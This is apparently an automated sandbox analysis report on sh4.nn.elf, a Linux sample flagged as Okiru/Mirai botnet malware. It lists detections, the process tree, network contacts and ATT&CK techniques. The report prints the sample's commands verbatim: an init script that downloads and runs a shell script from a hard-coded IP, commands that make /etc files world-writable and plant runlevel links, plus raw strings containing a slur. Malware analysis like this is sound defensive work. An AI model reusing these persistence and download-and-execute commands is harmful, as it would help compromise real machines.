Edit tour

Linux Analysis Report
sh4.nn.elf

Overview

General Information

Sample name:	sh4.nn.elf
Analysis ID:	1580245
MD5:	a77b2146e2cee3edd81794c6dc36cc4f
SHA1:	9a7e1e6b0a404bad276c263c904774e7d3b12a66
SHA256:	98f07d8da535ace7c61c1de942960e763490483c02a811d38b6f59496e05b498
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580245
Start date and time:	2024-12-24 06:27:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	sh4.nn.elf
Detection:	MAL
Classification:	mal80.spre.troj.evad.linELF@0/10@0/0

Runtime Messages

Command:	/tmp/sh4.nn.elf
PID:	6247
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6221, Parent: 4332)

rm (PID: 6221, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c

dash New Fork (PID: 6222, Parent: 4332)

rm (PID: 6222, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c

sh4.nn.elf (PID: 6247, Parent: 6149, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.nn.elf

sh4.nn.elf New Fork (PID: 6270, Parent: 6247)

sh (PID: 6270, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6272, Parent: 6270)

systemctl (PID: 6272, Parent: 6270, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

sh4.nn.elf New Fork (PID: 6288, Parent: 6247)

sh (PID: 6288, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6294, Parent: 6288)

chmod (PID: 6294, Parent: 6288, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

sh4.nn.elf New Fork (PID: 6295, Parent: 6247)

sh (PID: 6295, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6300, Parent: 6295)

ln (PID: 6300, Parent: 6295, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

sh4.nn.elf New Fork (PID: 6301, Parent: 6247)

sh (PID: 6301, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"

sh4.nn.elf New Fork (PID: 6303, Parent: 6247)

sh (PID: 6303, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6305, Parent: 6303)

chmod (PID: 6305, Parent: 6303, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh4.nn.elf

sh4.nn.elf New Fork (PID: 6306, Parent: 6247)

sh (PID: 6306, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6311, Parent: 6306)

mkdir (PID: 6311, Parent: 6306, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

sh4.nn.elf New Fork (PID: 6312, Parent: 6247)

sh (PID: 6312, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6317, Parent: 6312)

ln (PID: 6317, Parent: 6312, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf

sh4.nn.elf New Fork (PID: 6318, Parent: 6247)

sh4.nn.elf New Fork (PID: 6320, Parent: 6318)

udisksd New Fork (PID: 6259, Parent: 799)

dumpe2fs (PID: 6259, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6285, Parent: 6284)

snapd-env-generator (PID: 6285, Parent: 6284, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6330, Parent: 799)

dumpe2fs (PID: 6330, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6364, Parent: 799)

dumpe2fs (PID: 6364, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sh4.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6247.1.00007ff828400000.00007ff828414000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: sh4.nn.elf PID: 6247	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: sh4.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: sh4.nn.elf

ReversingLabs: Detection: 31%

Source: sh4.nn.elf

String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60024 -> 94.156.227.234:38242

Source: /tmp/sh4.nn.elf (PID: 6247)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: sh4.nn.elf, system.16.dr, inittab.16.dr, sh4.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	String found in binary or memory: http://94.156.227.233/
Source: sh4.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal80.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/sh4.nn.elf (PID: 6247)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/sh4.nn.elf (PID: 6247)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6300)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6317)	File: /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/sh4.nn.elf (PID: 6247)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6294)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6305)	File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6395/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6053/cmdline	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6394/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6364/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6397/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6396/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6388/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6399/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6387/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6398/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6401/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6389/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6400/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6391/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6390/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6393/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6392/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6403/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6402/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6320)	File opened: /proc/6404/status	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6270)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6288)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6295)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6301)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6303)	Shell command executed: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6306)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6312)	Shell command executed: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6294)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6305)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh4.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6311)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 6221)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c			Jump to behavior
Source: /usr/bin/dash (PID: 6222)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c			Jump to behavior

Source: /bin/sh (PID: 6272)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6247)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6294)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6305)	File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6247)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/sh4.nn.elf (PID: 6247)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6301)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh4.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/sh4.nn.elf (PID: 6247)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6301)	File: /etc/init.d/sh4.nn.elf			Jump to dropped file

Source: /tmp/sh4.nn.elf (PID: 6247)

Queries kernel information via 'uname':

Jump to behavior

Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.7ouZ2A
Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmp	Binary or memory string: V/tmp/qemu-open.7ouZ2A
Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.nn.elf
Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmp	Binary or memory string: V!/usr/bin/vmtoolsd
Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXXSXPF
Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmp	Binary or memory string: V5!/etc/qemu-binfmt/sh4

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: sh4.nn.elf, type: SAMPLE
Source: Yara match	File source: 6247.1.00007ff828400000.00007ff828414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sh4.nn.elf PID: 6247, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: sh4.nn.elf, type: SAMPLE
Source: Yara match	File source: 6247.1.00007ff828400000.00007ff828414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sh4.nn.elf PID: 6247, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sh4.nn.elf	32%	ReversingLabs	Linux.Exploit.Mirai
sh4.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs
/etc/rc.local	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.233/oro1vk	sh4.nn.elf	false		high
http://94.156.227.233/	sh4.nn.elf, system.16.dr, inittab.16.dr, sh4.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.171.230.55	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	zerarm6.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	hidakibest.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	Space.x86.elf	Get hash	malicious	Mirai	Browse
	nn.elf	Get hash	malicious	Nanominer, Xmrig	Browse
	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	dlr.arm6.elf	Get hash	malicious	Unknown	Browse
	arm6.elf	Get hash	malicious	Mirai	Browse
	http://112.31.189.32:40158	Get hash	malicious	Mirai	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	mips.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse
91.189.91.43	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	nklarm6.elf	Get hash	malicious	Unknown	Browse
	nabarm6.elf	Get hash	malicious	Unknown	Browse
	zerarm6.elf	Get hash	malicious	Unknown	Browse
	armv4eb.elf	Get hash	malicious	Unknown	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	tftp.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	91.189.91.42
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
